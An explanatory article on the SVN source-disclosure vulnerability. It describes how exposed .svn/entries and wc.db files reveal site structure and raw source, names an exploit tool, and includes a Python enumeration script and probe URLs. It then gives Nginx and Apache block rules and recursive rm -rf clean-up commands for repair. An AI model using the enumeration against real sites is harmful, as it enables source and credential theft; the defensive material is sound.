SVN (Subversion) is source code version management software. The main cause of SVN source code disclosure is non-standard administrator practice. When SVN is used to manage code locally, a hidden folder named .svn is generated automatically in every working-copy directory; it contains important metadata about the source tree. Some site administrators do not use the 'export' feature when publishing code but instead copy the working-copy folder straight to the web server, which exposes the .svn hidden folder to the Internet. An attacker can then read the 'entries' file (part of the version-tracking information) to step through the site structure. (The .svn/entries file reveals the names of every file and subdirectory, the SVN repository URL, the usernames of the last committers and other information.) Working copies created with Subversion 1.7 or later no longer keep a per-directory entries file; the same metadata is stored in a single SQLite database, .svn/wc.db, at the working-copy root, and an exposed wc.db discloses the same information.
More seriously, the .svn directory also holds a pristine copy of every source file, with the suffix .svn-base (under .svn/text-base/ in older SVN versions, under .svn/pristine/ in 1.7 and later). If the web server does not parse that suffix, the attacker can download the raw source of any file directly, including PHP files and configuration files that would otherwise be executed rather than served.
Use
1. Exploit tool: Seay svn exploit tool
2. Enter the site URL
Append /.svn/entries to the URL to list the site directory, then fetch the .svn-base copies to download the entire site. A quick manual check: request http://target/.svn/entries (or /.svn/wc.db for SVN 1.7+); anything other than a 403/404 means the working copy is exposed.
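The enumeration the tool automates, as an added example written for this page (it is not the article's code and not the Seay tool): a Python script that parses both metadata formats, the pre-1.7 .svn/entries file and the 1.7+ .svn/wc.db SQLite database, and reconstructs the site layout together with the path of each pristine .svn-base copy. It runs offline on constructed sample data; in practice each path would be fetched from the target with an HTTP GET. The sample file names, repository URL and checksums are assumptions.

```python
"""Enumerate an exposed Subversion working copy from its metadata.

Added example, not taken from the article or from the Seay tool it names.
Handles both formats: the per-directory .svn/entries file (SVN <= 1.6) and
the single .svn/wc.db SQLite database (SVN >= 1.7). All sample data below is
constructed; in practice each path would be fetched from the target, e.g.
http://target/.svn/entries (assumed URL)."""
import sqlite3
from typing import Callable, List, Optional, Tuple

Entry = Tuple[str, str, str]  # (path, kind, where the pristine copy lives)

# Constructed SVN 1.6-style entries file (format 10). Entries are separated
# by a form feed (\x0c) on its own line; the first entry has an empty name
# and describes the directory itself. Field order within an entry:
# name, kind, revision, url, repos root, schedule, text-time, checksum, ...
SAMPLE_ENTRIES = (
    "10\n"
    "\ndir\n42\nhttp://svn.example.com/repo/trunk/www\nhttp://svn.example.com/repo\n"
    "\x0c\n"
    "index.php\nfile\n\n\n\n\n2013-01-01T00:00:00.000000Z\n"
    "0123456789abcdef0123456789abcdef\n"
    "\x0c\n"
    "config.inc.php\nfile\n"
    "\x0c\n"
    "admin\ndir\n"
    "\x0c\n"
)
SAMPLE_ADMIN_ENTRIES = "10\n\ndir\n\x0c\nlogin.php\nfile\n\x0c\n"


def parse_entries(text: str, prefix: str = "") -> List[Entry]:
    """Parse one .svn/entries file. For files, the pristine copy is
    <dir>/.svn/text-base/<name>.svn-base; for subdirectories, the next
    entries file to fetch is <dir>/<name>/.svn/entries."""
    body = text.split("\n", 1)[1] if "\n" in text else ""  # drop format line
    found: List[Entry] = []
    for chunk in body.split("\x0c\n"):
        lines = chunk.split("\n")
        if len(lines) < 2 or not lines[0]:
            continue  # trailing empty chunk, or the directory's own entry
        name, kind = lines[0], lines[1]
        if kind == "file":
            found.append((prefix + name, kind, f"{prefix}.svn/text-base/{name}.svn-base"))
        else:
            found.append((prefix + name, kind, f"{prefix}{name}/.svn/entries"))
    return found


def walk_entries(fetch: Callable[[str], Optional[str]], prefix: str = "") -> List[Entry]:
    """Recursively enumerate a pre-1.7 working copy. `fetch(path)` returns the
    text at <site>/<path> or None; over HTTP it would be a GET request."""
    text = fetch(prefix + ".svn/entries")
    if text is None:
        return []
    found: List[Entry] = []
    for entry in parse_entries(text, prefix):
        found.append(entry)
        if entry[1] == "dir":
            found.extend(walk_entries(fetch, entry[0] + "/"))
    return found


def parse_wc_db(conn: sqlite3.Connection) -> List[Entry]:
    """Same listing from a 1.7+ wc.db. The NODES table holds every path with
    its kind and a '$sha1$<hex>' checksum; the pristine copy is stored
    content-addressed as .svn/pristine/<hex[:2]>/<hex>.svn-base."""
    rows = conn.execute(
        "SELECT local_relpath, kind, checksum FROM NODES "
        "WHERE local_relpath != '' ORDER BY local_relpath"
    ).fetchall()
    found: List[Entry] = []
    for relpath, kind, checksum in rows:
        pristine = ""
        if kind == "file" and checksum and checksum.startswith("$sha1$"):
            sha1 = checksum[len("$sha1$"):]
            pristine = f".svn/pristine/{sha1[:2]}/{sha1}.svn-base"
        found.append((relpath, kind, pristine))
    return found


def build_sample_wc_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a real wc.db, with only the three
    NODES columns this script reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, checksum TEXT)")
    conn.executemany("INSERT INTO NODES VALUES (?, ?, ?)", [
        ("", "dir", None),
        ("index.php", "file", "$sha1$" + "a" * 40),
        ("admin", "dir", None),
        ("admin/login.php", "file", "$sha1$" + "b" * 40),
    ])
    return conn


if __name__ == "__main__":
    site = {".svn/entries": SAMPLE_ENTRIES, "admin/.svn/entries": SAMPLE_ADMIN_ENTRIES}
    for path, kind, pristine in walk_entries(site.get):
        print(f"{kind:4} {path:20} -> {pristine}")
    for path, kind, pristine in parse_wc_db(build_sample_wc_db()):
        print(f"{kind:4} {path:20} -> {pristine}")
```

The walk stops at any directory whose entries file cannot be fetched, so a partially cleaned site still yields whatever remains exposed. The pristine paths are the ones to request next: a server that does not handle the .svn-base suffix returns the raw file content.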
Repair
1. Add a rule to the web server configuration that blocks every request to a path containing .svn and returns 404
Nginx server (directive names are case-sensitive, so it must be "location", not "Location"):
location ~ ^(.*)\/\.svn\/ {
    return 404;
}
Then reload or restart Nginx (nginx -t to check the configuration first, then nginx -s reload).
Apache server (the directives must sit inside a directory container; this is the Apache 2.2 syntax):
<DirectoryMatch "\.svn">
    Order Allow,Deny
    Deny from all
</DirectoryMatch>
On Apache 2.4 use "Require all denied" inside the container instead of the Order/Deny pair. Then restart Apache (apachectl configtest first).
2. Find all .svn hidden folders on the server and delete them
Any of the following commands deletes the .svn folders under the current directory:
find . -type d -name ".svn" | xargs rm -rf
rm -rf `find . -type d -name .svn`
find . -name ".svn" -type d | xargs rm -fr
find . -name ".svn" -type d | xargs -n1 rm -r
These four break on paths that contain whitespace; the -print0 / xargs -0 form used in the script is the safe variant.
Delete with a script:
#!/bin/sh
cd /home/web/ || exit 1
find ./ -name ".svn" -type d -print0 | xargs -0 rm -fr
if [ $? -ne 0 ]; then
    echo "Remove .svn dirs failed!"
    exit 1
fi
Save the above as a .sh file, make it executable and run it.
After it runs, every .svn hidden folder in the /home/web directory and its subdirectories is deleted. Removing the metadata also removes the .svn-base pristine copies, since they live inside .svn.
Defense
Developers must use the export feature (svn export) when publishing code from SVN; it writes a clean copy of the tree without any .svn folder. Copying a working copy directly to the web server is prohibited.
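A post-deploy check that enforces the rule above, as an added example (not the article's own script): a POSIX shell snippet that lists any .svn folder or .svn-base pristine copy left under a web root and fails when it finds one, plus an optional probe of the public URL. The web root and URL are assumptions; the test tree it is shown against is constructed.

```sh
#!/bin/sh
# Added example, not from the original article. Run after every deploy
# (after `svn export`, or after the .svn clean-up script above) to confirm
# that no Subversion working-copy metadata reached the web root.

# Print every .svn directory and every pristine copy (*.svn-base) under $1.
list_svn_leftovers() {
    find "$1" \( -type d -name .svn -o -type f -name '*.svn-base' \) -print 2>/dev/null
}

# Exit status 0 when the tree is clean, 1 when anything was found.
webroot_is_clean() {
    leftovers=$(list_svn_leftovers "$1")
    [ -z "$leftovers" ]
}

# External check from the attacker's side: an exposed working copy answers
# 200 for /.svn/entries (pre-1.7) or /.svn/wc.db (1.7+); a fixed server
# answers 404 or 403. Prints the HTTP status code of the given URL.
probe_url() {
    curl -s -o /dev/null -w '%{http_code}' "$1"
}

# Usage (assumed paths): webroot_is_clean /var/www/html || { list_svn_leftovers /var/www/html; exit 1; }
#                        probe_url http://www.example.com/.svn/entries
```

Wire webroot_is_clean into the deployment job so a deploy that leaves metadata behind fails instead of going live; probe_url is the same request an attacker makes and should return 404 after the server configuration change.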
SVN Source Disclosure Vulnerability